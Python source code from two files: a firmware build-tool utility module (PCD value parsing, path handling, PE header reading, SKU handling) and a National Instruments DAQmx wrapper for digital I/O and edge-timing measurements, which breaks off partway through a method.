if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if not Value:
IsValid = False
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or (Value.startswith("L'") or Value.startswith("'") and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
try:
Value = long(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there's problem
# in non-windows platform to launch command
#
def SplitOption(OptionString):
OptionList = []
LastChar = " "
OptionStart = 0
QuotationMark = ""
for Index in range(0, len(OptionString)):
CurrentChar = OptionString[Index]
if CurrentChar in ['"', "'"]:
if QuotationMark == CurrentChar:
QuotationMark = ""
elif QuotationMark == "":
QuotationMark = CurrentChar
continue
elif QuotationMark:
continue
if CurrentChar in ["/", "-"] and LastChar in [" ", "\t", "\r", "\n"]:
if Index > OptionStart:
OptionList.append(OptionString[OptionStart:Index - 1])
OptionStart = Index
LastChar = CurrentChar
OptionList.append(OptionString[OptionStart:])
return OptionList
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in xrange(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
Value = Value.strip()
if not Value:
return None
if Value[0] == '{':
if not Value.endswith('}'):
return None
Value = Value.replace(' ', '').replace('{', '').replace('}', '')
ValFields = Value.split(',')
try:
for Index in range(len(ValFields)):
ValFields[Index] = str(int(ValFields[Index], 0))
except ValueError:
return None
Value = '{' + ','.join(ValFields) + '}'
return Value
Unicode = False
if Value.startswith('L"'):
if not Value.endswith('"'):
return None
Value = Value[1:]
Unicode = True
elif not Value.startswith('"') or not Value.endswith('"'):
return None
Value = eval(Value) # translate escape character
NewValue = '{'
for Index in range(0, len(Value)):
if Unicode:
NewValue = NewValue + str(ord(Value[Index]) % 0x10000) + ','
else:
NewValue = NewValue + str(ord(Value[Index]) % 0x100) + ','
Value = NewValue + '0}'
return Value
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
if isinstance(Other, type(self)):
return self.Path == Other.Path
else:
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparsion operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
if isinstance(Other, type(self)):
OtherKey = Other.Path
else:
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE informaion.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != 'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = sdict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = SkuIds.keys()
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
#
# Pack a registry format GUID
#
def PackRegistryFormatGuid(Guid):
return PackGUID(Guid.split('-'))
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either a integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if type(Input) in (int, long):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
pass
|
daqmx.py
|
r"""
NI IO Trace can be used to troubleshoot & debug the setup. It should be installed
when the NI-DAQmx driver is installed.
PyDAQmx parses the NIDAQmx.h header to build ctypes wrappers for all function,
constants, etc. It also wraps the functions which return errors codes to raise
exceptions (and warnings) based on the return value.
https://www.ni.com/en-au/support/downloads/drivers/download.ni-daqmx.html#409845
API Reference manual:
https://zone.ni.com/reference/en-XX/help/370471AM-01/
C:\Program Files (x86)\National Instruments\NI-DAQ\DAQmx ANSI C Dev\include\NIDAQmx.h
C:\Program Files\National Instruments\NI-DAQ\DAQmx ANSI C Dev\include\NIDAQmx.h
"""
from collections import namedtuple
from fixate.core.common import ExcThread
from queue import Queue, Empty
from ctypes import byref, c_char_p
import numpy
# Basic Functions
from PyDAQmx import (
DAQmxResetDevice,
TaskHandle,
int32,
uInt8,
float64,
uInt64,
uInt32,
)
# Tasks
from PyDAQmx import (
DAQmxCreateTask,
DAQmxStartTask,
DAQmxWaitUntilTaskDone,
DAQmxStopTask,
DAQmxClearTask,
)
# Channels
from PyDAQmx import (
DAQmxCreateDOChan,
DAQmxCreateDIChan,
DAQmxReadDigitalLines,
DAQmxWriteDigitalLines,
DAQmx_Val_GroupByScanNumber,
DAQmx_Val_ChanPerLine,
DAQmxReadCounterScalarF64,
DAQmx_Val_Rising,
DAQmx_Val_Seconds,
DAQmxCfgSampClkTiming,
DAQmx_Val_FiniteSamps,
)
# Two Edge Separation
from PyDAQmx import (
DAQmxCreateCITwoEdgeSepChan,
DAQmxSetCITwoEdgeSepFirstTerm,
DAQmxGetCITwoEdgeSepFirstTerm,
DAQmxSetCITwoEdgeSepSecondTerm,
DAQmxGetCITwoEdgeSepSecondTerm,
DAQmx_Val_Falling,
)
# Signal Routing
from PyDAQmx import (
DAQmxConnectTerms,
DAQmxDisconnectTerms,
DAQmxTristateOutputTerm,
DAQmx_Val_InvertPolarity,
DAQmx_Val_DoNotInvertPolarity,
)
from fixate.core.exceptions import InstrumentError, ParameterError
IORange = namedtuple("IORange", ["port", "range_start", "range_end"])
IORange.__new__.__defaults__ = (0, None, None)
IOLine = namedtuple("IOLine", ["port", "line"])
IOLine.__new__.__defaults__ = (0, None)
class DaqTask:
""" """
task_state = ""
task = None
def read(self):
raise NotImplementedError("Read not available for this Task")
def write(self, data):
raise NotImplementedError("Write not available for this Task")
def trigger(self):
raise NotImplementedError("Trigger not available for this Task")
def init(self):
"""
This method should be overridden to create the task
:return:
"""
def stop(self):
if self.task_state == "running":
DAQmxStopTask(self.task)
self.task_state = "stopped"
def clear(self):
self.stop()
if self.task_state != "":
DAQmxClearTask(self.task)
self.task = None
self.task_state = ""
def start(self):
if self.task_state == "running":
return
if self.task_state == "":
self.init()
DAQmxStartTask(self.task)
self.task_state = "running"
class DigitalOut(DaqTask):
""" """
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(
self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None,
)
return data_arr
def write(self, data):
"""
Data must be an iterable like a list of 1s and 0s
Data is grouped by scan number. Each element in the array will write to each line in the digital output until
exhausted and then will start from the beginning for the next sample. Sample rate is as set in creating the IO
task.
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError(
"data must be a length divisible by {}".format(self.io_length)
)
data_arr = numpy.zeros(len(data), uInt8)
data_arr[:] = data
except TypeError:
if self.io_length != 1:
raise ValueError(
"data must be a list of length divisible by {}".format(
self.io_length
)
)
data_arr = numpy.zeros(1, uInt8)
data_arr[:] = [data]
written = int32()
DAQmxWriteDigitalLines(
self.task,
len(data_arr) // self.io_length, # Samples per channel
1, # Autostart task
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
written,
None,
)
class DigitalIn(DaqTask):
""" """
def __init__(self, task_string, io_length):
self.io_length = io_length
self.task_string = task_string
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDIChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
if self.task_state in ["init", "stopped"]:
self.start()
def read(self):
self.init()
data_arr = numpy.zeros(self.io_length, uInt8)
samples_per_chan = int32()
num_bytes_per_sample = int32()
DAQmxReadDigitalLines(
self.task,
1, # Samples per channel
2.0, # Timeout
DAQmx_Val_GroupByScanNumber, # Interleaved
data_arr,
len(data_arr),
byref(samples_per_chan),
byref(num_bytes_per_sample),
None,
)
return data_arr
class BufferedWrite(DaqTask):
""" """
def __init__(self, task_string, io_length, frequency):
self.task_string = task_string
self.io_length = io_length
self.frequency = frequency
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
self.task_state = "init"
def write(self, data):
"""
The task should be in stopped state when calling write, it automatically starts the task through the
DAQmxWriteDigitalLines call. When write is finished it is back in a stopped state
:param data:
:return:
"""
self.init()
try:
if len(data) % self.io_length:
raise ValueError(
"data must be a length divisible by {}".format(self.io_length)
)
except TypeError as e:
raise ValueError(
"data must be in an list divisible by {}".format(self.io_length)
) from e
if len(data) == self.io_length:
# Sample clock only works for more than one sample so duplicate the sample
data = list(data)
data.extend(data)
DAQmxCfgSampClkTiming(
self.task,
None,
float64(self.frequency),
DAQmx_Val_Rising,
DAQmx_Val_FiniteSamps,
uInt64(int(len(data) // self.io_length)),
)
try:
data_arr = numpy.zeros((len(data)), uInt8)
data_arr[:] = data
written = int32()
DAQmxWriteDigitalLines(
self.task,
int(len(data) // self.io_length),
1,
-1,
DAQmx_Val_GroupByScanNumber,
data_arr,
written,
None,
)
self.task_state = "running"
DAQmxWaitUntilTaskDone(self.task, -1)
if written.value != len(data) // self.io_length:
raise InstrumentError("Values not written correctly")
finally:
self.stop()
class TwoEdgeSeparation(DaqTask):
_data = float64()
_trigger_thread = None
def __init__(
self,
device_name,
counter_chan,
min_val,
max_val,
first_edge_type,
second_edge_type,
source_terminal,
destination_terminal,
):
self.device_name = device_name
self.counter_chan = counter_chan
self.min_val = min_val
self.max_val = max_val
self.first_edge_type = first_edge_type
self.second_edge_type = second_edge_type
self.source_terminal = source_terminal
self.destination_terminal = destination_terminal
self._error_queue = Queue()
self._thread_timeout = 10
def init(self):
if self.task_state == "":
self.task = TaskHandle()
DAQmxCreateTask(b"", byref(self.task))
DAQmxCreateCITwoEdgeSepChan(
self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
b"",
float64(self.min_val),
float64(self.max_val),
DAQmx_Val_Seconds,
self.first_edge_type,
self.second_edge_type,
b"",
)
if self.source_terminal:
tmp_data = c_char_p(self.source_terminal.encode())
DAQmxSetCITwoEdgeSepFirstTerm(
self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
)
if self.destination_terminal:
tmp_data = c_char_p(self.destination_terminal.encode())
DAQmxSetCITwoEdgeSepSecondTerm(
self.task,
"{}/{}".format(self.device_name, self.counter_chan).encode(),
tmp_data,
)
self.task_state = "init"
def read(self):
self._trigger_thread.join(self._thread_timeout)
if self._trigger_thread.is_alive():
raise InstrumentError("Trigger thread failed to terminate")
try:
err = self._error_queue.get_nowait()
except Empty:
# no error in queue
pass
else:
raise err
# TODO: consider making this return self._data.value. We should return a python
# float object, not a ctypes.c_double
return self._data
def _read(self):
try:
DAQmxReadCounterScalarF64(
self.task, float64(self._thread_timeout), byref(self._data), None
)
except Exception as e:
self._error_queue.put(ThreadError(e))
return
def trigger(self):
if self._trigger_thread:
self.clear()
self._trigger_thread.join(self._thread_timeout)
if self._trigger_thread.is_alive():
raise InstrumentError("Existing Trigger Event in Progress")
self.init()
self._trigger_thread = ExcThread(target=self._read)
self._trigger_thread.start()
class ThreadError(Exception):
"""
give a name to an error that came from a thread
"""
pass
class DaqMx:
"""
Implements the digital input and output functions of the National Instruments DAQ
usage:
daq = DaqMx()
# Create a digital output from port 0 line 2 to line 4 named 'P0.2:4'
daq.create_digital_output('P0.2:4', port=0, range_start=2, length=3)
# Create a digital output with default port 0, at line 7 named 'reset'
daq.create_digital_output('reset', 7)
# Create a digital input at port 0 line 1
daq.create_digital_input('P0.1', range_start=1)
# This example assumes that port 0 line 1 is shorted to port 0 line 7 named reset
daq.start()
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [0] Echo Port: [0]'
daq["P0.7"] = 1 # or True or '1' or [1]
print("Port 7:", daq["reset"], "Echo Port:", daq["P0.1"])
>>>'Port 7: [1] Echo Port: [1]'
print(daq["P0.2:4"])
>>>'[0 0 0]'
daq["P0.2:4"] = [0, 1, 0] # Need to assign all values if initialised as multiple
print(daq["P0.2:4"])
>>>'[0 1 0]'
daq.stop()
"""
def __init__(self):
self.device_name = "Dev1"
self.tasks = {}
self.reset()
self.triggers = {}
def reset(self):
DAQmxResetDevice(self.device_name.encode())
for _, task in self.tasks.items():
task.task_state = ""
def signal_route(
self,
source_terminal,
destination_terminal,
disconnect=False,
tri_state=False,
invert=False,
):
"""
Immediately routes a signal between two terminals
Set destination_terminal to '' if tri_state output is required on the source_terminal
terminals are PFI X as they are the programmable terminals.
See NI-MAX Device Routes for available terminal names.
Leave out the device name
eg. /Dev 1/PFI0 would be PFI0
"""
source_terminal = "/{}/{}".format(self.device_name, source_terminal).encode()
destination_terminal = "/{}/{}".format(
self.device_name, destination_terminal
).encode()
if disconnect:
DAQmxDisconnectTerms(source_terminal, destination_terminal)
elif tri_state:
DAQmxTristateOutputTerm(source_terminal)
else:
if invert:
invert = DAQmx_Val_InvertPolarity
else:
invert = DAQmx_Val_DoNotInvertPolarity
DAQmxConnectTerms(source_terminal, destination_terminal, invert)
def create_two_edge_separation(
self,
ident,
counter_chan,
min_val,
max_val,
first_edge_type,
second_edge_type,
source_terminal=None,
destination_terminal=None,
):
"""
Returns the two edge separation of two signals
:param ident:
Identification string used for reading the data via
daq = DaqMx()
daq.create_two_edge_separation(ident, **params)
daq.trigger_measurement(ident)
# Do stuff
# Read the edge separation after causing the event
edge_sep = daq[ident]
:param counter_chan:
For X-Series DAQs PCI
'ctr0', 'ctr1', 'ctr2', 'ctr3' where the connected terminals are:
Start = "AUX", Stop = "GATE"
ctr0 ctr1 ctr2 ctr3
Start: PFI 10 Pin45 Start: PFI 11 Pin46 Start: PFI 2 Pin43 Start: PFI 7 Pin38
Stop: PFI 9 Pin3 Stop: PFI 4 Pin41 Stop: PFI 1 Pin10 Stop: PFI 6 Pin5
:param min_val:
The minimum value, in units, that you expect to measure.
eg. 0.0001
:param max_val:
The maximum value, in units, that you expect to measure.
eg. 0.83
:param first_edge_type:
The start trigger on the first edge
"rising" or "falling"
:param second_edge_type:
The stop trigger on the second edge
"rising" or "falling"
:param source_terminal
:param destination_terminal
Override the default counter terminals.
eg.
ctr0
eg. source_terminal = "PFI14" will make the Start pin as PFI 14 in stead of 10
"""
if counter_chan not in ["ctr0", "ctr1", "ctr2", "ctr3"]:
